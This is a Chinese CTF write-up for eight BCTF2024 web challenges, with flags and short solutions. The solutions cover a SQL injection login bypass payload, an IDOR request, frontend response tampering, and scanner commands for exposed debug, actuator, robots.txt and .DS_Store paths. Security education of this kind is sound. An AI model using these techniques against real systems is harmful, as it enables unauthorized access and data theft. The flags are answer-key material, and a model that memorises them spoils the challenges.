# BCTF2024-WEB-01~08
# 万能密码
题目
小明是一个运维工程师,他竟然忘记了管理台的密码,看着系统登录框,他陷入了沉思
www.example.com
答案
flag{9b29c64d7d5c05103510474792e59a67}
题解
sql 注入
密码输入 `1' or '1'='1`
# 未授权访问
题目
小明是一个研发工程师,有一次他接到一个需求,负责为 http://example.com:8080/ 管理平台添加一个接口,写个接口的事,实现功能逻辑很简单,但不要忘了安全授权
答案
flag{ac07a1308c5580fbbe57c16afdad1ae3}
题解
js 代码中有一段这个
, Y = () => D({ | |
url: "http://" + window.location.host + "/api/userinfo?id=" + t.toString(), | |
method: "get" | |
}) |
请求 http://example.com/api/userinfo?id=0
# 前端认证
题目
小明是一个运维工程师,他竟然忘记了管理台 http://example.com/#/login 的密码,看着系统登录框,他又陷入了沉思
答案
flag{4bfc0fb4b27629d86daa293e61657294}
题解
劫持前端将 返回 code 改为 “0” 即可
# github
题目
小雅是一个研发工程师,有一天他接到了一个 bctf2024 的一个游戏项目,由于项目紧迫,他想回家后继续努力工作,多么勤劳的程序猿啊,然而他习惯性的登录了 github
答案
flag{03321386129b425e2c190baf810f8e44}
题解
通过搜索 BCTF2024,找到仓库,再 commit 中记录有 flag
# 线上调试信息
题目
小韩是一个研发工程师,一天他在解决一个线上 http://example.com/#/login bug,于是开启了调试信息,上线后,忘了关了。。。。。
答案
flag{1101748de24f770b3ea3fe92af73450b}
题解
# 扫url
wscan --log-level=debug ws --plug=dirscan --basic-crawler http://example.com:8080/ --html-output=./wscan_scan_result.html
# 发现 http://example.com/debug/pprof/
# http://example.com/debug/pprof/cmdline?debug=1
# 不安全配置
题目
小丁是一个研发工程师,一天他为了 http://example.com:8080/#/login 监控服务方便,他配置了 actuator
答案
flag{75b8eecf3ff828a958d20b03c8077ddc}
题解
# 扫一下url
wscan --log-level=debug ws --plug=dirscan --basic-crawler http://example.com/api/ --html-output=./wscan_scan_result_api.html
找到 /api/actuator
heapdump 用 idea 打开,有 flag
# 不可以爬取的路径
题目
小夏上线了他的网站 http://example.com/#/login
答案
flag{aa2646a667ee1cd83235786dccef4a26}
题解
http://example.com/robots.txt
User-agent: *
Disallow: flag_1s_3ere
http://example.com/flag_1s_3ere
# 线上备份
题目
小 S 是一个运维工程师,一天他接到业务需求,进行线上 http://example.com/#/login 代码备份,然后就悲剧了
答案
flag{93ac40e0ceda197913f46d78c9d4715b}
题解
# 扫一下
wscan --log-level=debug ws --plug=dirscan --basic-crawler http://example.com/ --html-output=./wscan_scan_result.html
有个 .DS_Store 文件ttps://github.com/lijiejie/ds_store_exp
用这个打开
python3 ds_store_exp.py http://example.com/.DS_Store
找到目录
http://example.com/assets.zip
打开有个 flag